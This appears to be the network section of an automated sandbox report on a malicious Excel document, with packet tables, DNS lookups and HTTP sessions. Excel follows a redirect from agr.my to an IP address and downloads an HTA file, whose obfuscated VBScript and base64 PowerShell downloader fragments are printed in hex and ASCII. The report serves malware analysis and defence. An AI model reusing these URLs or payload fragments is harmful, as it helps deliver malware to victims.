                  Mar 26, 2025 08:03:39.680668116 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.680708885 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.681446075 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.713833094 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.713861942 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.713921070 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.713957071 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.713973045 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.714016914 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.745758057 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.745788097 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.745830059 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.745862961 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.745878935 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.745973110 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.779381037 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.779409885 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.779458046 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.779494047 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.779510975 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.779532909 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.804419041 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.804447889 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.804512978 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.804547071 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.804568052 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.804688931 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.837140083 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.837165117 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.837241888 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.837272882 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.837291956 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.837318897 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.866771936 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.866803885 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.866837978 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.866867065 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.866883993 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.866933107 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.896038055 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.896075964 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.896105051 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.896130085 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.896150112 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.896316051 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.926702023 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.926737070 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.926774025 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.926800966 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.926821947 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.926845074 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.948242903 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.948273897 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.948368073 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.948406935 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.948422909 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.948611021 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.980961084 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.980988026 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.981026888 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.981041908 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:39.981053114 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:39.981082916 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.013916969 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.013952017 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.014014006 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.014044046 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.014059067 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.014435053 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.037549973 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.037576914 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.037632942 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.037642002 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.037689924 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.061263084 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.061290026 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.061352968 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.061363935 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.061383009 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.061405897 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.095912933 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.095940113 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.096036911 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.096064091 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.096152067 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.117346048 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.117372036 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.117430925 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.117460966 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.117479086 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.117538929 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.147501945 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.147526979 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.147589922 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.147620916 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.147645950 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.147757053 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.183965921 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.183990002 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.184056044 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.184086084 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.184293032 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.205974102 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.206007004 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.206046104 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.206058025 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.206098080 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.232496023 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.232532024 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.232577085 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.232587099 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.232624054 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.262846947 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.262873888 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.262928009 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.262954950 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.262969971 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.262994051 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.290483952 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.290507078 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.290572882 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.290595055 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.290616989 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.290647030 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.313654900 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.313679934 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.313755035 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.313776016 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.313805103 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.334048986 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.334070921 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.334156990 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.334178925 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.334192991 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.334214926 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.368294954 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.368315935 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.368364096 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.368381977 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.368412971 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.368431091 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.393579960 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.393614054 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.393663883 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.393699884 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.393713951 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.393754959 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.416323900 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.416351080 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.416410923 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.416420937 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.416456938 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.417926073 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.418009996 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.418081999 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.418107986 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.418122053 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.418122053 CET49700443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:40.418131113 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:40.418137074 CET4434970013.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.365361929 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.365412951 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.366121054 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.366296053 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.366306067 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.366771936 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.366816998 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.366910934 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.367124081 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.367141962 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.652460098 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.653752089 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.653790951 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.654886007 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.654898882 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.658170938 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.658787966 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.658802032 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.659764051 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.659770012 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.835969925 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.835994959 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.836056948 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.836071968 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.836107969 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.836363077 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.836384058 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.836394072 CET49702443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.836400032 CET4434970213.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.845886946 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.846369982 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.846565008 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.846635103 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.846652031 CET4434970113.107.246.40192.168.2.7
                  Mar 26, 2025 08:03:44.846664906 CET49701443192.168.2.713.107.246.40
                  Mar 26, 2025 08:03:44.846669912 CET4434970113.107.246.40192.168.2.7
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 26, 2025 08:03:22.383100033 CET5376953192.168.2.71.1.1.1
                  Mar 26, 2025 08:03:22.497399092 CET53537691.1.1.1192.168.2.7
                  Mar 26, 2025 08:03:37.742518902 CET6003353192.168.2.71.1.1.1
                  Mar 26, 2025 08:03:37.864866018 CET53600331.1.1.1192.168.2.7
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 26, 2025 08:03:22.383100033 CET192.168.2.71.1.1.10xaabeStandard query (0)agr.myA (IP address)IN (0x0001)false
                  Mar 26, 2025 08:03:37.742518902 CET192.168.2.71.1.1.10x657cStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 26, 2025 08:02:33.005079031 CET1.1.1.1192.168.2.70x47aeNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Mar 26, 2025 08:02:33.005079031 CET1.1.1.1192.168.2.70x47aeNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                  Mar 26, 2025 08:02:33.005079031 CET1.1.1.1192.168.2.70x47aeNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                  Mar 26, 2025 08:02:33.517287016 CET1.1.1.1192.168.2.70x25cdNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                  Mar 26, 2025 08:02:33.517287016 CET1.1.1.1192.168.2.70x25cdNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                  Mar 26, 2025 08:03:22.497399092 CET1.1.1.1192.168.2.70xaabeNo error (0)agr.my147.79.86.93A (IP address)IN (0x0001)false
                  Mar 26, 2025 08:03:37.864866018 CET1.1.1.1192.168.2.70x657cNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                  Mar 26, 2025 08:03:37.864866018 CET1.1.1.1192.168.2.70x657cNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                  Mar 26, 2025 08:03:37.864866018 CET1.1.1.1192.168.2.70x657cNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Mar 26, 2025 08:03:37.864866018 CET1.1.1.1192.168.2.70x657cNo error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Mar 26, 2025 08:03:37.864866018 CET1.1.1.1192.168.2.70x657cNo error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                  • agr.my
                  • otelrules.svc.static.microsoft
                  • 192.3.216.141
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.749698192.3.216.141806712C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  Mar 26, 2025 08:03:23.730647087 CET241OUTGET /bestkissingdayswithgreatnicebeautygirlsareound.hta HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Connection: Keep-Alive
                  Host: 192.3.216.141
                  Mar 26, 2025 08:03:23.886694908 CET1254INHTTP/1.1 200 OK
                  Content-Type: application/hta
                  Last-Modified: Tue, 25 Mar 2025 17:24:57 GMT
                  Accept-Ranges: bytes
                  ETag: "a13eaad4aa9ddb1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Wed, 26 Mar 2025 07:03:23 GMT
                  Content-Length: 14060
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 43 52 69 50 54 20 74 79 70 45 3d 22 74 65 78 54 2f 56 62 53 63 72 69 50 54 22 3e 0d 0a 44 49 6d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 64 6e 62 4f 50 49 74 42 47 71 67 6e 4d [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><sCRiPT typE="texT/VbScriPT">DImdnbOPItBGqgnMnFdLtAZmeMtiwFsNihSmkRxzvzWizpHRkpBFOddSKxHmGSgUCEKfpxYWmLlojkciHKjloCCzDIGuNAXciFdKxhyGzScZniFnaCIDPoGHdiYKNQbLuZEdClggFJftHvyILIHKlAvTHMtiBfzzIBWmBWeXZYZwnoQ,xKINborVoExJWamuONslhuwkLzfFyDbzburEgqlmtbVWqBMIGpEWJNxLqawURLOJnurFRMkBTzBWJoPCTRdjSyLOFOqNMDKCIezAkxDVqvfrfjIkdPDHJwABej [TRUNCATED]
                  Mar 26, 2025 08:03:23.886714935 CET1254INData Raw: 56 6e 74 45 43 6d 68 76 50 45 67 49 4f 4d 44 53 57 6c 42 65 66 71 47 54 52 6b 57 6d 5a 68 6c 6f 41 63 74 44 46 68 68 6d 59 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: VntECmhvPEgIOMDSWlBefqGTRkWmZhloActDFhhmY:
                  Mar 26, 2025 08:03:23.890853882 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: (
                  Mar 26, 2025 08:03:23.890873909 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: xKINborVoExJWamuONslhuwkLzfFyDbzburEgqlmtbVWqBMIGpEWJNxLqawURLOJnurFRMkBTzBWJoPCTRdjSyLOFOqNMDKCIezAkxDVqvfrfjIkdPDHJwABejBSjZfnOUBVntECmhvPE
                  Mar 26, 2025 08:03:23.890944958 CET1254INData Raw: 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 51 55 52 45 4c 56 52 5a 63 45 55 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4c 55 31 6c 54 55 4a 46 55 6b
                  Data Ascii: ICAgICAgICAgICAgQURELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5
                  Mar 26, 2025 08:03:23.890961885 CET1254INData Raw: 2b 27 29 29 27 29 29 29 22 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: +'))')))":
                  Mar 26, 2025 08:03:23.890978098 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: )
                  Mar 26, 2025 08:03:23.890995026 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: &
                  Mar 26, 2025 08:03:23.891033888 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: cHR
                  Mar 26, 2025 08:03:23.891050100 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 26 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: &
                  Mar 26, 2025 08:03:24.041085005 CET1254INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                  Data Ascii: )


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.749697147.79.86.934436712C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-03-26 07:03:22 UTC222OUTGET /KKhF4w?&insolence=nauseating&president HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: agr.my
                  Connection: Keep-Alive
                  2025-03-26 07:03:23 UTC452INHTTP/1.1 302 Found
                  Content-Length: 93
                  Content-Type: text/plain; charset=utf-8
                  Date: Wed, 26 Mar 2025 07:03:23 GMT
                  Location: http://192.3.216.141/bestkissingdayswithgreatnicebeautygirlsareound.hta
                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                  Vary: Accept
                  X-Content-Type-Options: nosniff
                  X-Dns-Prefetch-Control: off
                  X-Download-Options: noopen
                  X-Frame-Options: SAMEORIGIN
                  X-Xss-Protection: 1; mode=block
                  Connection: close
                  2025-03-26 07:03:23 UTC93INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 31 36 2e 31 34 31 2f 62 65 73 74 6b 69 73 73 69 6e 67 64 61 79 73 77 69 74 68 67 72 65 61 74 6e 69 63 65 62 65 61 75 74 79 67 69 72 6c 73 61 72 65 6f 75 6e 64 2e 68 74 61
                  Data Ascii: Found. Redirecting to http://192.3.216.141/bestkissingdayswithgreatnicebeautygirlsareound.hta


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.74970013.107.246.404436712C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-03-26 07:03:38 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                  Host: otelrules.svc.static.microsoft
                  2025-03-26 07:03:38 UTC500INHTTP/1.1 200 OK
                  Date: Wed, 26 Mar 2025 07:03:38 GMT
                  Content-Type: text/plain
                  Content-Length: 1114783
                  Connection: close
                  Vary: Accept-Encoding
                  Cache-Control: public
                  Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                  ETag: "0x8DD6AD97FEF19EF"
                  x-ms-request-id: ebdb26f1-701e-000d-2b05-9e6de3000000
